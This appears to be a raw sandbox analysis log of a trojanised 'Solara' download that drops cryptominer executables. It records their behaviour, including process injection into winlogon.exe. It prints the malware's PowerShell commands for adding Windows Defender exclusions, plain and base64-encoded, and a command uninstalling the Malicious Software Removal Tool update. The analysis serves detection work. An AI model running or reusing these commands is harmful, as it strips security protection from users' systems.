Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeCode function: 10_2_004014D1 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,10_2_004014D1
Source: C:\Users\user\AppData\Local\Temp\kx new.exeCode function: 13_2_004014D1 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,13_2_004014D1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeCode function: 19_2_0000027E82477D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0000027E82477D90
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeCode function: 19_2_0000027E8247D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0000027E8247D2A4
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeCode function: 22_2_0000012C42A8D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_0000012C42A8D2A4
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeCode function: 22_2_0000012C42A87D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_0000012C42A87D90
Source: C:\Windows\System32\winlogon.exeCode function: 66_2_000001E8589B7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,66_2_000001E8589B7D90
Source: C:\Windows\System32\winlogon.exeCode function: 66_2_000001E8589BD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,66_2_000001E8589BD2A4
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeMemory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Allocates memory in foreign processes
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 1E858950000 protect: page execute and read and write
Contains functionality to inject code into remote processes
Source: C:\Windows\System32\dialer.exeCode function: 51_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,51_2_0000000140001C88
Encrypted powershell cmdline option found
Source: C:\Users\user\Desktop\Solara.exeProcess created: Base64 decoded <#pxn#>Add-MpPreference <#ayf#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#gae#> -Force <#wep#>
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeProcess created: Base64 decoded <#iub#>Add-MpPreference <#vqw#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#dmx#> -Force <#bfi#>
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: Base64 decoded <#dpt#>Add-MpPreference <#apt#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#njg#> -Force <#hnq#>
Source: C:\Users\user\Desktop\Solara.exeProcess created: Base64 decoded <#pxn#>Add-MpPreference <#ayf#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#gae#> -Force <#wep#>Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeProcess created: Base64 decoded <#iub#>Add-MpPreference <#vqw#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#dmx#> -Force <#bfi#>Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: Base64 decoded <#dpt#>Add-MpPreference <#apt#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#njg#> -Force <#hnq#>
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeMemory written: C:\Windows\System32\dialer.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E858950000 value starts with: 4D5A
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\eth.exeThread register set: target process: 5236Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr.exeThread register set: target process: 2700Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeThread register set: target process: 8032
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeThread register set: target process: 8048
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeMemory written: C:\Windows\System32\dialer.exe base: 140000000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E858950000
Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA="Jump to behavior
Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Users\user\AppData\Local\Temp\eth.exe "C:\Users\user\AppData\Local\Temp\eth.exe" Jump to behavior
Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Users\user\AppData\Local\Temp\xmr.exe "C:\Users\user\AppData\Local\Temp\xmr.exe" Jump to behavior
Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe "C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA="Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeProcess created: C:\Users\user\AppData\Local\Temp\kx new.exe "C:\Users\user\AppData\Local\Temp\kx new.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeProcess created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA="
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: C:\Users\user\AppData\Local\Temp\Kawpow new.exe "C:\Users\user\AppData\Local\Temp\Kawpow new.exe"
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: C:\Users\user\AppData\Local\Temp\xmr new.exe "C:\Users\user\AppData\Local\Temp\xmr new.exe"
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajahaaeabuacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajageaeqbmacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajagcayqblacmapgagac0argbvahiaywblacaapaajahcazqbwacmapga="
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagkadqbiacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajahyacqb3acmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajagqabqb4acmapgagac0argbvahiaywblacaapaajagiazgbpacmapga="
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagqacab0acmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajageacab0acmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajag4aagbnacmapgagac0argbvahiaywblacaapaajaggabgbxacmapga="
Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajahaaeabuacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajageaeqbmacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajagcayqblacmapgagac0argbvahiaywblacaapaajahcazqbwacmapga="Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagkadqbiacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajahyacqb3acmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajagqabqb4acmapgagac0argbvahiaywblacaapaajagiazgbpacmapga="Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagqacab0acmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajageacab0acmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajag4aagbnacmapgagac0argbvahiaywblacaapaajaggabgbxacmapga="
Source: C:\Windows\System32\dialer.exeCode function: 51_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,51_2_0000000140001B54
Source: C:\Windows\System32\dialer.exeCode function: 51_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,51_2_0000000140001B54
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeCode function: 19_2_0000027E823336F0 cpuid 19_2_0000027E823336F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
